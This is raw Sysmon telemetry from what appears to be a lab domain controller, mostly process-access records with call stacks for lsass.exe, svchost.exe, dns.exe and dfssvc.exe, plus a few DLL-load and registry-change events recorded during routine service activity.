13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.220{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-495.attackrange.local 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.220{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.188{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.142{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.954{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 